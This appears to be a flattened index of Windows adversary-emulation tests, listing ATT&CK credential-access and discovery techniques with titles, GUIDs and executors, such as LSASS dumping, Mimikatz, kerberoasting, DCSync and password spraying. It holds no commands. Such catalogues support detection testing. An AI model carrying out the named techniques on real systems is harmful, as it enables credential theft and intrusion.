833 credential-access T1555 Credentials from Password Stores 5 Enumerate credentials from Windows Credential Manager using vaultcmd.exe [Web Credentials] bc071188-459f-44d5-901a-f8f2625b2d2e powershell
834 credential-access T1555 Credentials from Password Stores 6 WinPwn - Loot local Credentials - lazagne 079ee2e9-6f16-47ca-a635-14efcd994118 powershell
835 credential-access T1555 Credentials from Password Stores 7 WinPwn - Loot local Credentials - Wifi Credentials afe369c2-b42e-447f-98a3-fb1f4e2b8552 powershell
836 credential-access T1555 Credentials from Password Stores 8 WinPwn - Loot local Credentials - Decrypt Teamviewer Passwords db965264-3117-4bad-b7b7-2523b7856b92 powershell
837 credential-access T1555.003 Credentials from Password Stores: Credentials from Web Browsers 1 Run Chrome-password Collector 8c05b133-d438-47ca-a630-19cc464c4622 powershell
838 credential-access T1555.003 Credentials from Password Stores: Credentials from Web Browsers 3 LaZagne - Credentials from Browser 9a2915b3-3954-4cce-8c76-00fbf4dbd014 command_prompt
839 credential-access T1555.003 Credentials from Password Stores: Credentials from Web Browsers 4 Simulating access to Chrome Login Data 3d111226-d09a-4911-8715-fe11664f960d powershell
840 credential-access T1555.003 Credentials from Password Stores: Credentials from Web Browsers 5 Simulating access to Opera Login Data 28498c17-57e4-495a-b0be-cc1e36de408b powershell
841 credential-access T1555.003 Credentials from Password Stores: Credentials from Web Browsers 6 Simulating access to Windows Firefox Login Data eb8da98a-2e16-4551-b3dd-83de49baa14c powershell
842 credential-access T1555.003 Credentials from Password Stores: Credentials from Web Browsers 7 Simulating access to Windows Edge Login Data a6a5ec26-a2d1-4109-9d35-58b867689329 powershell
843 credential-access T1555.003 Credentials from Password Stores: Credentials from Web Browsers 8 Decrypt Mozilla Passwords with Firepwd.py dc9cd677-c70f-4df5-bd1c-f114af3c2381 powershell
844 credential-access T1555.003 Credentials from Password Stores: Credentials from Web Browsers 10 Stage Popular Credential Files for Exfiltration f543635c-1705-42c3-b180-efd6dc6e7ee7 powershell
845 credential-access T1555.003 Credentials from Password Stores: Credentials from Web Browsers 11 WinPwn - BrowserPwn 764ea176-fb71-494c-90ea-72e9d85dce76 powershell
846 credential-access T1555.003 Credentials from Password Stores: Credentials from Web Browsers 12 WinPwn - Loot local Credentials - mimi-kittenz ec1d0b37-f659-4186-869f-31a554891611 powershell
847 credential-access T1555.003 Credentials from Password Stores: Credentials from Web Browsers 13 WinPwn - PowerSharpPack - Sharpweb for Browser Credentials e5e3d639-6ea8-4408-9ecd-d5a286268ca0 powershell
848 credential-access T1555.003 Credentials from Password Stores: Credentials from Web Browsers 15 WebBrowserPassView - Credentials from Browser e359627f-2d90-4320-ba5e-b0f878155bbe powershell
849 credential-access T1555.003 Credentials from Password Stores: Credentials from Web Browsers 16 BrowserStealer (Chrome / Firefox / Microsoft Edge) 6f2c5c87-a4d5-4898-9bd1-47a55ecaf1dd powershell
850 credential-access T1552.004 Unsecured Credentials: Private Keys 1 Private Keys 520ce462-7ca7-441e-b5a5-f8347f632696 command_prompt
851 credential-access T1552.004 Unsecured Credentials: Private Keys 6 ADFS token signing and encryption certificates theft - Local 78e95057-d429-4e66-8f82-0f060c1ac96f powershell
852 credential-access T1552.004 Unsecured Credentials: Private Keys 7 ADFS token signing and encryption certificates theft - Remote cab413d8-9e4a-4b8d-9b84-c985bd73a442 powershell
853 credential-access T1552.004 Unsecured Credentials: Private Keys 8 CertUtil ExportPFX 336b25bf-4514-4684-8924-474974f28137 powershell
854 credential-access T1552.004 Unsecured Credentials: Private Keys 9 Export Root Certificate with Export-PFXCertificate 7617f689-bbd8-44bc-adcd-6f8968897848 powershell
855 credential-access T1552.004 Unsecured Credentials: Private Keys 10 Export Root Certificate with Export-Certificate 78b274f8-acb0-428b-b1f7-7b0d0e73330a powershell
856 credential-access T1552.004 Unsecured Credentials: Private Keys 11 Export Certificates with Mimikatz 290df60e-4b5d-4a5e-b0c7-dc5348ea0c86 command_prompt
857 credential-access T1557.001 Adversary-in-the-Middle: LLMNR/NBT-NS Poisoning and SMB Relay 1 LLMNR Poisoning with Inveigh (PowerShell) deecd55f-afe0-4a62-9fba-4d1ba2deb321 powershell
858 credential-access T1003.001 OS Credential Dumping: LSASS Memory 1 Dump LSASS.exe Memory using ProcDump 0be2230c-9ab3-4ac2-8826-3199b9a0ebf8 command_prompt
859 credential-access T1003.001 OS Credential Dumping: LSASS Memory 2 Dump LSASS.exe Memory using comsvcs.dll 2536dee2-12fb-459a-8c37-971844fa73be powershell
860 credential-access T1003.001 OS Credential Dumping: LSASS Memory 3 Dump LSASS.exe Memory using direct system calls and API unhooking 7ae7102c-a099-45c8-b985-4c7a2d05790d command_prompt
861 credential-access T1003.001 OS Credential Dumping: LSASS Memory 4 Dump LSASS.exe Memory using NanoDump dddd4aca-bbed-46f0-984d-e4c5971c51ea command_prompt
862 credential-access T1003.001 OS Credential Dumping: LSASS Memory 5 Dump LSASS.exe Memory using Windows Task Manager dea6c349-f1c6-44f3-87a1-1ed33a59a607 manual
863 credential-access T1003.001 OS Credential Dumping: LSASS Memory 6 Offline Credential Theft With Mimikatz 453acf13-1dbd-47d7-b28a-172ce9228023 command_prompt
864 credential-access T1003.001 OS Credential Dumping: LSASS Memory 7 LSASS read with pypykatz c37bc535-5c62-4195-9cc3-0517673171d8 command_prompt
865 credential-access T1003.001 OS Credential Dumping: LSASS Memory 8 Dump LSASS.exe Memory using Out-Minidump.ps1 6502c8f0-b775-4dbd-9193-1298f56b6781 powershell
866 credential-access T1003.001 OS Credential Dumping: LSASS Memory 9 Create Mini Dump of LSASS.exe using ProcDump 7cede33f-0acd-44ef-9774-15511300b24b command_prompt
867 credential-access T1003.001 OS Credential Dumping: LSASS Memory 10 Powershell Mimikatz 66fb0bc1-3c3f-47e9-a298-550ecfefacbc powershell
868 credential-access T1003.001 OS Credential Dumping: LSASS Memory 11 Dump LSASS with createdump.exe from .Net v5 9d0072c8-7cca-45c4-bd14-f852cfa35cf0 powershell
869 credential-access T1003.001 OS Credential Dumping: LSASS Memory 12 Dump LSASS.exe using imported Microsoft DLLs 86fc3f40-237f-4701-b155-81c01c48d697 powershell
870 credential-access T1110.003 Brute Force: Password Spraying 1 Password Spray all Domain Users 90bc2e54-6c84-47a5-9439-0a2a92b4b175 command_prompt
871 credential-access T1110.003 Brute Force: Password Spraying 2 Password Spray (DomainPasswordSpray) 263ae743-515f-4786-ac7d-41ef3a0d4b2b powershell
872 credential-access T1110.003 Brute Force: Password Spraying 3 Password spray all Active Directory domain users with a single password via LDAP against domain controller (NTLM or Kerberos) f14d956a-5b6e-4a93-847f-0c415142f07d powershell
873 credential-access T1110.003 Brute Force: Password Spraying 5 WinPwn - DomainPasswordSpray Attacks 5ccf4bbd-7bf6-43fc-83ac-d9e38aff1d82 powershell
874 credential-access T1110.003 Brute Force: Password Spraying 6 Password Spray Invoke-DomainPasswordSpray Light b15bc9a5-a4f3-4879-9304-ea0011ace63a powershell
875 credential-access T1110.003 Brute Force: Password Spraying 8 Password Spray using Kerbrute Tool c6f25ec3-6475-47a9-b75d-09ac593c5ecb powershell
876 credential-access T1003.005 OS Credential Dumping: Cached Domain Credentials 1 Cached Credential Dump via Cmdkey 56506854-89d6-46a3-9804-b7fde90791f9 command_prompt
877 credential-access T1558.001 Steal or Forge Kerberos Tickets: Golden Ticket 1 Crafting Active Directory golden tickets with mimikatz 9726592a-dabc-4d4d-81cd-44070008b3af powershell
878 credential-access T1558.001 Steal or Forge Kerberos Tickets: Golden Ticket 2 Crafting Active Directory golden tickets with Rubeus e42d33cd-205c-4acf-ab59-a9f38f6bad9c powershell
879 credential-access T1649 Steal or Forge Authentication Certificates 1 Staging Local Certificates via Export-Certificate eb121494-82d1-4148-9e2b-e624e03fbf3d powershell
880 credential-access T1552.001 Unsecured Credentials: Credentials In Files 4 Extracting passwords with findstr 0e56bf29-ff49-4ea5-9af4-3b81283fd513 powershell
881 credential-access T1552.001 Unsecured Credentials: Credentials In Files 5 Access unattend.xml 367d4004-5fc0-446d-823f-960c74ae52c3 command_prompt
882 credential-access T1552.001 Unsecured Credentials: Credentials In Files 7 WinPwn - sensitivefiles 114dd4e3-8d1c-4ea7-bb8d-8d8f6aca21f0 powershell
883 credential-access T1552.001 Unsecured Credentials: Credentials In Files 8 WinPwn - Snaffler fdd0c913-714b-4c13-b40f-1824d6c015f2 powershell
884 credential-access T1552.001 Unsecured Credentials: Credentials In Files 9 WinPwn - powershellsensitive 75f66e03-37d3-4704-9520-3210efbe33ce powershell
885 credential-access T1552.001 Unsecured Credentials: Credentials In Files 10 WinPwn - passhunt 00e3e3c7-6c3c-455e-bd4b-461c7f0e7797 powershell
886 credential-access T1552.001 Unsecured Credentials: Credentials In Files 11 WinPwn - SessionGopher c9dc9de3-f961-4284-bd2d-f959c9f9fda5 powershell
887 credential-access T1552.001 Unsecured Credentials: Credentials In Files 12 WinPwn - Loot local Credentials - AWS, Microsoft Azure, and Google Compute credentials aaa87b0e-5232-4649-ae5c-f1724a4b2798 powershell
888 credential-access T1552.006 Unsecured Credentials: Group Policy Preferences 1 GPP Passwords (findstr) 870fe8fb-5e23-4f5f-b89d-dd7fe26f3b5f command_prompt
889 credential-access T1552.006 Unsecured Credentials: Group Policy Preferences 2 GPP Passwords (Get-GPPPassword) e9584f82-322c-474a-b831-940fd8b4455c powershell
890 credential-access T1056.002 Input Capture: GUI Input Capture 2 PowerShell - Prompt User for Password 2b162bfd-0928-4d4c-9ec3-4d9f88374b52 powershell
891 credential-access T1110.004 Brute Force: Credential Stuffing 3 Brute Force:Credential Stuffing using Kerbrute Tool 4852c630-87a9-409b-bb5e-5dc12c9ebcde powershell
892 credential-access T1187 Forced Authentication 1 PetitPotam 485ce873-2e65-4706-9c7e-ae3ab9e14213 powershell
893 credential-access T1187 Forced Authentication 2 WinPwn - PowerSharpPack - Retrieving NTLM Hashes without Touching LSASS 7f06b25c-799e-40f1-89db-999c9cc84317 powershell
894 credential-access T1558.002 Steal or Forge Kerberos Tickets: Silver Ticket 1 Crafting Active Directory silver tickets with mimikatz 385e59aa-113e-4711-84d9-f637aef01f2c powershell
895 credential-access T1555.004 Credentials from Password Stores: Windows Credential Manager 1 Access Saved Credentials via VaultCmd 9c2dd36d-5c8b-4b29-8d72-a11b0d5d7439 command_prompt
896 credential-access T1555.004 Credentials from Password Stores: Windows Credential Manager 2 WinPwn - Loot local Credentials - Invoke-WCMDump fa714db1-63dd-479e-a58e-7b2b52ca5997 powershell
897 credential-access T1003.003 OS Credential Dumping: NTDS 1 Create Volume Shadow Copy with vssadmin dcebead7-6c28-4b4b-bf3c-79deb1b1fc7f command_prompt
898 credential-access T1003.003 OS Credential Dumping: NTDS 2 Copy NTDS.dit from Volume Shadow Copy c6237146-9ea6-4711-85c9-c56d263a6b03 command_prompt
899 credential-access T1003.003 OS Credential Dumping: NTDS 3 Dump Active Directory Database with NTDSUtil 2364e33d-ceab-4641-8468-bfb1d7cc2723 command_prompt
900 credential-access T1003.003 OS Credential Dumping: NTDS 4 Create Volume Shadow Copy with WMI 224f7de0-8f0a-4a94-b5d8-989b036c86da command_prompt
901 credential-access T1003.003 OS Credential Dumping: NTDS 5 Create Volume Shadow Copy remotely with WMI d893459f-71f0-484d-9808-ec83b2b64226 command_prompt
902 credential-access T1003.003 OS Credential Dumping: NTDS 6 Create Volume Shadow Copy remotely (WMI) with esentutl 21c7bf80-3e8b-40fa-8f9d-f5b194ff2865 command_prompt
903 credential-access T1003.003 OS Credential Dumping: NTDS 7 Create Volume Shadow Copy with Powershell 542bb97e-da53-436b-8e43-e0a7d31a6c24 powershell
904 credential-access T1003.003 OS Credential Dumping: NTDS 8 Create Symlink to Volume Shadow Copy 21748c28-2793-4284-9e07-d6d028b66702 command_prompt
905 credential-access T1558.003 Steal or Forge Kerberos Tickets: Kerberoasting 1 Request for service tickets 3f987809-3681-43c8-bcd8-b3ff3a28533a powershell
906 credential-access T1558.003 Steal or Forge Kerberos Tickets: Kerberoasting 2 Rubeus kerberoast 14625569-6def-4497-99ac-8e7817105b55 powershell
907 credential-access T1558.003 Steal or Forge Kerberos Tickets: Kerberoasting 3 Extract all accounts in use as SPN using setspn e6f4affd-d826-4871-9a62-6c9004b8fe06 command_prompt
908 credential-access T1558.003 Steal or Forge Kerberos Tickets: Kerberoasting 4 Request A Single Ticket via PowerShell 988539bc-2ed7-4e62-aec6-7c5cf6680863 powershell
909 credential-access T1558.003 Steal or Forge Kerberos Tickets: Kerberoasting 5 Request All Tickets via PowerShell 902f4ed2-1aba-4133-90f2-cff6d299d6da powershell
910 credential-access T1558.003 Steal or Forge Kerberos Tickets: Kerberoasting 6 WinPwn - Kerberoasting 78d10e20-c874-45f2-a9df-6fea0120ec27 powershell
911 credential-access T1558.003 Steal or Forge Kerberos Tickets: Kerberoasting 7 WinPwn - PowerSharpPack - Kerberoasting Using Rubeus 29094950-2c96-4cbd-b5e4-f7c65079678f powershell
912 credential-access T1003.006 OS Credential Dumping: DCSync 1 DCSync (Active Directory) 129efd28-8497-4c87-a1b0-73b9a870ca3e command_prompt
913 credential-access T1003.006 OS Credential Dumping: DCSync 2 Run DSInternals Get-ADReplAccount a0bced08-3fc5-4d8b-93b7-e8344739376e powershell
914 credential-access T1056.004 Input Capture: Credential API Hooking 1 Hook PowerShell TLS Encrypt/Decrypt Messages de1934ea-1fbf-425b-8795-65fb27dd7e33 powershell
915 discovery T1033 System Owner/User Discovery 1 System Owner/User Discovery 4c4959bf-addf-4b4a-be86-8d09cc1857aa command_prompt
916 discovery T1033 System Owner/User Discovery 3 Find computers where user has session - Stealth mode (PowerView) 29857f27-a36f-4f7e-8084-4557cd6207ca powershell
917 discovery T1033 System Owner/User Discovery 4 User Discovery With Env Vars PowerShell Script dcb6cdee-1fb0-4087-8bf8-88cfd136ba51 powershell
918 discovery T1033 System Owner/User Discovery 5 GetCurrent User with PowerShell Script 1392bd0f-5d5a-429e-81d9-eb9d4d4d5b3b powershell
919 discovery T1033 System Owner/User Discovery 6 System Discovery - SocGholish whoami 3d257a03-eb80-41c5-b744-bb37ac7f65c7 powershell
920 discovery T1615 Group Policy Discovery 1 Display group policy information via gpresult 0976990f-53b1-4d3f-a185-6df5be429d3b command_prompt
921 discovery T1615 Group Policy Discovery 2 Get-DomainGPO to display group policy information via PowerView 4e524c4e-0e02-49aa-8df5-93f3f7959b9f powershell
922 discovery T1615 Group Policy Discovery 3 WinPwn - GPOAudit bc25c04b-841e-4965-855f-d1f645d7ab73 powershell
923 discovery T1615 Group Policy Discovery 4 WinPwn - GPORemoteAccessPolicy 7230d01a-0a72-4bd5-9d7f-c6d472bc6a59 powershell
924 discovery T1615 Group Policy Discovery 5 MSFT Get-GPO Cmdlet 52778a8f-a10b-41a4-9eae-52ddb74072bf powershell
925 discovery T1087.002 Account Discovery: Domain Account 1 Enumerate all accounts (Domain) 6fbc9e68-5ad7-444a-bd11-8bf3136c477e command_prompt
926 discovery T1087.002 Account Discovery: Domain Account 2 Enumerate all accounts via PowerShell (Domain) 8b8a6449-be98-4f42-afd2-dedddc7453b2 powershell
927 discovery T1087.002 Account Discovery: Domain Account 3 Enumerate logged on users via CMD (Domain) 161dcd85-d014-4f5e-900c-d3eaae82a0f7 command_prompt
928 discovery T1087.002 Account Discovery: Domain Account 4 Automated AD Recon (ADRecon) 95018438-454a-468c-a0fa-59c800149b59 powershell
929 discovery T1087.002 Account Discovery: Domain Account 5 Adfind -Listing password policy 736b4f53-f400-4c22-855d-1a6b5a551600 command_prompt
930 discovery T1087.002 Account Discovery: Domain Account 6 Adfind - Enumerate Active Directory Admins b95fd967-4e62-4109-b48d-265edfd28c3a command_prompt
931 discovery T1087.002 Account Discovery: Domain Account 7 Adfind - Enumerate Active Directory User Objects e1ec8d20-509a-4b9a-b820-06c9b2da8eb7 command_prompt
932 discovery T1087.002 Account Discovery: Domain Account 8 Adfind - Enumerate Active Directory Exchange AD Objects 5e2938fb-f919-47b6-8b29-2f6a1f718e99 command_prompt
933 discovery T1087.002 Account Discovery: Domain Account 9 Enumerate Default Domain Admin Details (Domain) c70ab9fd-19e2-4e02-a83c-9cfa8eaa8fef command_prompt
934 discovery T1087.002 Account Discovery: Domain Account 10 Enumerate Active Directory for Unconstrained Delegation 46f8dbe9-22a5-4770-8513-66119c5be63b powershell
935 discovery T1087.002 Account Discovery: Domain Account 11 Get-DomainUser with PowerView 93662494-5ed7-4454-a04c-8c8372808ac2 powershell
936 discovery T1087.002 Account Discovery: Domain Account 12 Enumerate Active Directory Users with ADSISearcher 02e8be5a-3065-4e54-8cc8-a14d138834d3 powershell
937 discovery T1087.002 Account Discovery: Domain Account 13 Enumerate Linked Policies In ADSISearcher Discovery 7ab0205a-34e4-4a44-9b04-e1541d1a57be powershell
938 discovery T1087.002 Account Discovery: Domain Account 14 Enumerate Root Domain linked policies Discovery 00c652e2-0750-4ca6-82ff-0204684a6fe4 powershell
939 discovery T1087.002 Account Discovery: Domain Account 15 WinPwn - generaldomaininfo ce483c35-c74b-45a7-a670-631d1e69db3d powershell
940 discovery T1087.002 Account Discovery: Domain Account 16 Kerbrute - userenum f450461c-18d1-4452-9f0d-2c42c3f08624 powershell
941 discovery T1087.002 Account Discovery: Domain Account 17 Wevtutil - Discover NTLM Users Remote b8a563d4-a836-4993-a74e-0a19b8481bfe powershell
942 discovery T1087.002 Account Discovery: Domain Account 18 Suspicious LAPS Attributes Query with Get-ADComputer all properties 394012d9-2164-4d4f-b9e5-acf30ba933fe powershell
943 discovery T1087.002 Account Discovery: Domain Account 19 Suspicious LAPS Attributes Query with Get-ADComputer ms-Mcs-AdmPwd property 6e85bdf9-7bc4-4259-ac0f-f0cb39964443 powershell
944 discovery T1087.002 Account Discovery: Domain Account 20 Suspicious LAPS Attributes Query with Get-ADComputer all properties and SearchScope ffbcfd62-15d6-4989-a21a-80bfc8e58bb5 powershell
945 discovery T1087.002 Account Discovery: Domain Account 21 Suspicious LAPS Attributes Query with adfind all properties abf00f6c-9983-4d9a-afbc-6b1c6c6448e1 powershell
946 discovery T1087.002 Account Discovery: Domain Account 22 Suspicious LAPS Attributes Query with adfind ms-Mcs-AdmPwd 51a98f96-0269-4e09-a10f-e307779a8b05 powershell
947 discovery T1087.001 Account Discovery: Local Account 8 Enumerate all accounts on Windows (Local) 80887bec-5a9b-4efc-a81d-f83eb2eb32ab command_prompt
948 discovery T1087.001 Account Discovery: Local Account 9 Enumerate all accounts via PowerShell (Local) ae4b6361-b5f8-46cb-a3f9-9cf108ccfe7b powershell
949 discovery T1087.001 Account Discovery: Local Account 10 Enumerate logged on users via CMD (Local) a138085e-bfe5-46ba-a242-74a6fb884af3 command_prompt
950 discovery T1497.001 Virtualization/Sandbox Evasion: System Checks 2 Detect Virtualization Environment (Windows) 502a7dc4-9d6f-4d28-abf2-f0e84692562d powershell
951 discovery T1497.001 Virtualization/Sandbox Evasion: System Checks 4 Detect Virtualization Environment via WMI Manufacturer/Model Listing (Windows) 4a41089a-48e0-47aa-82cb-5b81a463bc78 powershell
952 discovery T1069.002 Permission Groups Discovery: Domain Groups 1 Basic Permission Groups Discovery Windows (Domain) dd66d77d-8998-48c0-8024-df263dc2ce5d command_prompt
953 discovery T1069.002 Permission Groups Discovery: Domain Groups 2 Permission Groups Discovery PowerShell (Domain) 6d5d8c96-3d2a-4da9-9d6d-9a9d341899a7 powershell
954 discovery T1069.002 Permission Groups Discovery: Domain Groups 3 Elevated group enumeration using net group (Domain) 0afb5163-8181-432e-9405-4322710c0c37 command_prompt
955 discovery T1069.002 Permission Groups Discovery: Domain Groups 4 Find machines where user has local admin access (PowerView) a2d71eee-a353-4232-9f86-54f4288dd8c1 powershell
956 discovery T1069.002 Permission Groups Discovery: Domain Groups 5 Find local admins on all machines in domain (PowerView) a5f0d9f8-d3c9-46c0-8378-846ddd6b1cbd powershell
957 discovery T1069.002 Permission Groups Discovery: Domain Groups 6 Find Local Admins via Group Policy (PowerView) 64fdb43b-5259-467a-b000-1b02c00e510a powershell
958 discovery T1069.002 Permission Groups Discovery: Domain Groups 7 Enumerate Users Not Requiring Pre Auth (ASRepRoast) 870ba71e-6858-4f6d-895c-bb6237f6121b powershell
959 discovery T1069.002 Permission Groups Discovery: Domain Groups 8 Adfind - Query Active Directory Groups 48ddc687-82af-40b7-8472-ff1e742e8274 command_prompt
960 discovery T1069.002 Permission Groups Discovery: Domain Groups 9 Enumerate Active Directory Groups with Get-AdGroup 3d1fcd2a-e51c-4cbe-8d84-9a843bad8dc8 powershell
961 discovery T1069.002 Permission Groups Discovery: Domain Groups 10 Enumerate Active Directory Groups with ADSISearcher 9f4e344b-8434-41b3-85b1-d38f29d148d0 powershell
962 discovery T1069.002 Permission Groups Discovery: Domain Groups 11 Get-ADUser Enumeration using UserAccountControl flags (AS-REP Roasting) 43fa81fb-34bb-4b5f-867b-03c7dbe0e3d8 powershell
963 discovery T1069.002 Permission Groups Discovery: Domain Groups 12 Get-DomainGroupMember with PowerView 46352f40-f283-4fe5-b56d-d9a71750e145 powershell
964 discovery T1069.002 Permission Groups Discovery: Domain Groups 13 Get-DomainGroup with PowerView 5a8a181c-2c8e-478d-a943-549305a01230 powershell
965 discovery T1069.002 Permission Groups Discovery: Domain Groups 14 Active Directory Enumeration with LDIFDE 22cf8cb9-adb1-4e8c-80ca-7c723dfc8784 command_prompt
966 discovery T1007 System Service Discovery 1 System Service Discovery 89676ba1-b1f8-47ee-b940-2e1a113ebc71 command_prompt
967 discovery T1007 System Service Discovery 2 System Service Discovery - net.exe 5f864a3f-8ce9-45c0-812c-bdf7d8aeacc3 command_prompt
968 discovery T1040 Network Sniffing 3 Packet Capture Windows Command Prompt a5b2f6a0-24b4-493e-9590-c699f75723ca command_prompt
969 discovery T1040 Network Sniffing 4 Windows Internal Packet Capture b5656f67-d67f-4de8-8e62-b5581630f528 command_prompt
970 discovery T1040 Network Sniffing 5 Windows Internal pktmon capture c67ba807-f48b-446e-b955-e4928cd1bf91 command_prompt
971 discovery T1040 Network Sniffing 6 Windows Internal pktmon set filter 855fb8b4-b8ab-4785-ae77-09f5df7bff55 command_prompt
972 discovery T1135 Network Share Discovery 3 Network Share Discovery command prompt 20f1097d-81c1-405c-8380-32174d493bbb command_prompt
973 discovery T1135 Network Share Discovery 4 Network Share Discovery PowerShell 1b0814d1-bb24-402d-9615-1b20c50733fb powershell
974 discovery T1135 Network Share Discovery 5 View available share drives ab39a04f-0c93-4540-9ff2-83f862c385ae command_prompt
975 discovery T1135 Network Share Discovery 6 Share Discovery with PowerView b1636f0a-ba82-435c-b699-0d78794d8bfd powershell
976 discovery T1135 Network Share Discovery 7 PowerView ShareFinder d07e4cc1-98ae-447e-9d31-36cb430d28c4 powershell
977 discovery T1135 Network Share Discovery 8 WinPwn - shareenumeration 987901d1-5b87-4558-a6d9-cffcabc638b8 powershell
978 discovery T1135 Network Share Discovery 9 Network Share Discovery via dir command 13daa2cf-195a-43df-a8bd-7dd5ffb607b5 command_prompt
979 discovery T1120 Peripheral Device Discovery 1 Win32_PnPEntity Hardware Inventory 2cb4dbf2-2dca-4597-8678-4d39d207a3a5 powershell
980 discovery T1120 Peripheral Device Discovery 2 WinPwn - printercheck cb6e76ca-861e-4a7f-be08-564caa3e6f75 powershell
981 discovery T1082 System Information Discovery 1 System Information Discovery 66703791-c902-4560-8770-42b8a91f7667 command_prompt
982 discovery T1082 System Information Discovery 6 Hostname Discovery (Windows) 85cfbf23-4a1e-4342-8792-007e004b975f command_prompt
983 discovery T1082 System Information Discovery 8 Windows MachineGUID Discovery 224b4daf-db44-404e-b6b2-f4d1f0126ef8 command_prompt
984 discovery T1082 System Information Discovery 9 Griffon Recon 69bd4abe-8759-49a6-8d21-0f15822d6370 powershell
985 discovery T1082 System Information Discovery 10 Environment variables discovery on windows f400d1c0-1804-4ff8-b069-ef5ddd2adbf3 command_prompt
986 discovery T1082 System Information Discovery 13 WinPwn - winPEAS eea1d918-825e-47dd-acc2-814d6c58c0e1 powershell
987 discovery T1082 System Information Discovery 14 WinPwn - itm4nprivesc 3d256a2f-5e57-4003-8eb6-64d91b1da7ce powershell
988 discovery T1082 System Information Discovery 15 WinPwn - Powersploits privesc checks 345cb8e4-d2de-4011-a580-619cf5a9e2d7 powershell
989 discovery T1082 System Information Discovery 16 WinPwn - General privesc checks 5b6f39a2-6ec7-4783-a5fd-2c54a55409ed powershell
990 discovery T1082 System Information Discovery 17 WinPwn - GeneralRecon 7804659b-fdbf-4cf6-b06a-c03e758590e8 powershell
991 discovery T1082 System Information Discovery 18 WinPwn - Morerecon 3278b2f6-f733-4875-9ef4-bfed34244f0a powershell
992 discovery T1082 System Information Discovery 19 WinPwn - RBCD-Check dec6a0d8-bcaf-4c22-9d48-2aee59fb692b powershell
993 discovery T1082 System Information Discovery 20 WinPwn - PowerSharpPack - Watson searching for missing windows patches 07b18a66-6304-47d2-bad0-ef421eb2e107 powershell
994 discovery T1082 System Information Discovery 21 WinPwn - PowerSharpPack - Sharpup checking common Privesc vectors efb79454-1101-4224-a4d0-30c9c8b29ffc powershell
995 discovery T1082 System Information Discovery 22 WinPwn - PowerSharpPack - Seatbelt 5c16ceb4-ba3a-43d7-b848-a13c1f216d95 powershell
996 discovery T1082 System Information Discovery 25 System Information Discovery with WMIC 8851b73a-3624-4bf7-8704-aa312411565c command_prompt
997 discovery T1010 Application Window Discovery 1 List Process Main Windows - C# .NET fe94a1c3-3e22-4dc9-9fdf-3a8bdbc10dc4 command_prompt
998 discovery T1217 Browser Bookmark Discovery 4 List Google Chrome / Opera Bookmarks on Windows with powershell faab755e-4299-48ec-8202-fc7885eb6545 powershell
999 discovery T1217 Browser Bookmark Discovery 5 List Google Chrome / Edge Chromium Bookmarks on Windows with command prompt 76f71e2f-480e-4bed-b61e-398fe17499d5 command_prompt
1000 discovery T1217 Browser Bookmark Discovery 6 List Mozilla Firefox bookmarks on Windows with command prompt 4312cdbc-79fc-4a9c-becc-53d49c734bc5 command_prompt
1001 discovery T1217 Browser Bookmark Discovery 7 List Internet Explorer Bookmarks using the command prompt 727dbcdb-e495-4ab1-a6c4-80c7f77aef85 command_prompt
1002 discovery T1016 System Network Configuration Discovery 1 System Network Configuration Discovery on Windows 970ab6a1-0157-4f3f-9a73-ec4166754b23 command_prompt
1003 discovery T1016 System Network Configuration Discovery 2 List Windows Firewall Rules 038263cb-00f4-4b0a-98ae-0696c67e1752 command_prompt
1004 discovery T1016 System Network Configuration Discovery 4 System Network Configuration Discovery (TrickBot Style) dafaf052-5508-402d-bf77-51e0700c02e2 command_prompt
1005 discovery T1016 System Network Configuration Discovery 5 List Open Egress Ports 4b467538-f102-491d-ace7-ed487b853bf5 powershell
1006 discovery T1016 System Network Configuration Discovery 6 Adfind - Enumerate Active Directory Subnet Objects 9bb45dd7-c466-4f93-83a1-be30e56033ee command_prompt
1007 discovery T1016 System Network Configuration Discovery 7 Qakbot Recon 121de5c6-5818-4868-b8a7-8fd07c455c1b command_prompt
1008 discovery T1016 System Network Configuration Discovery 9 DNS Server Discovery Using nslookup 34557863-344a-468f-808b-a1bfb89b4fa9 command_prompt
1009 discovery T1482 Domain Trust Discovery 1 Windows - Discover domain trusts with dsquery 4700a710-c821-4e17-a3ec-9e4c81d6845f command_prompt
1010 discovery T1482 Domain Trust Discovery 2 Windows - Discover domain trusts with nltest 2e22641d-0498-48d2-b9ff-c71e496ccdbe command_prompt
1011 discovery T1482 Domain Trust Discovery 3 Powershell enumerate domains and forests c58fbc62-8a62-489e-8f2d-3565d7d96f30 powershell
1012 discovery T1482 Domain Trust Discovery 4 Adfind - Enumerate Active Directory OUs d1c73b96-ab87-4031-bad8-0e1b3b8bf3ec command_prompt
1013 discovery T1482 Domain Trust Discovery 5 Adfind - Enumerate Active Directory Trusts 15fe436d-e771-4ff3-b655-2dca9ba52834 command_prompt
1014 discovery T1482 Domain Trust Discovery 6 Get-DomainTrust with PowerView f974894c-5991-4b19-aaf5-7cc2fe298c5d powershell
1015 discovery T1482 Domain Trust Discovery 7 Get-ForestTrust with PowerView 58ed10e8-0738-4651-8408-3a3e9a526279 powershell
1016 discovery T1482 Domain Trust Discovery 8 TruffleSnout - Listing AD Infrastructure ea1b4f2d-5b82-4006-b64f-f2845608a3bf command_prompt
1017 discovery T1083 File and Directory Discovery 1 File and Directory Discovery (cmd.exe) 0e36303b-6762-4500-b003-127743b80ba6 command_prompt
1018 discovery T1083 File and Directory Discovery 2 File and Directory Discovery (PowerShell) 2158908e-b7ef-4c21-8a83-3ce4dd05a924 powershell
1019 discovery T1083 File and Directory Discovery 5 Simulating MAZE Directory Enumeration c6c34f61-1c3e-40fb-8a58-d017d88286d8 powershell
1020 discovery T1083 File and Directory Discovery 6 Launch DirLister Executable c5bec457-43c9-4a18-9a24-fe151d8971b7 powershell
1021 discovery T1049 System Network Connections Discovery 1 System Network Connections Discovery 0940a971-809a-48f1-9c4d-b1d785e96ee5 command_prompt
1022 discovery T1049 System Network Connections Discovery 2 System Network Connections Discovery with PowerShell f069f0f1-baad-4831-aa2b-eddac4baac4a powershell
1023 discovery T1049 System Network Connections Discovery 4 System Discovery using SharpView 96f974bb-a0da-4d87-a744-ff33e73367e9 powershell
1024 discovery T1057 Process Discovery 2 Process Discovery - tasklist c5806a4f-62b8-4900-980b-c7ec004e9908 command_prompt
1025 discovery T1057 Process Discovery 3 Process Discovery - Get-Process 3b3809b6-a54b-4f5b-8aff-cb51f2e97b34 powershell
1026 discovery T1057 Process Discovery 4 Process Discovery - get-wmiObject b51239b4-0129-474f-a2b4-70f855b9f2c2 powershell
1027 discovery T1057 Process Discovery 5 Process Discovery - wmic process 640cbf6d-659b-498b-ba53-f6dd1a1cc02c command_prompt
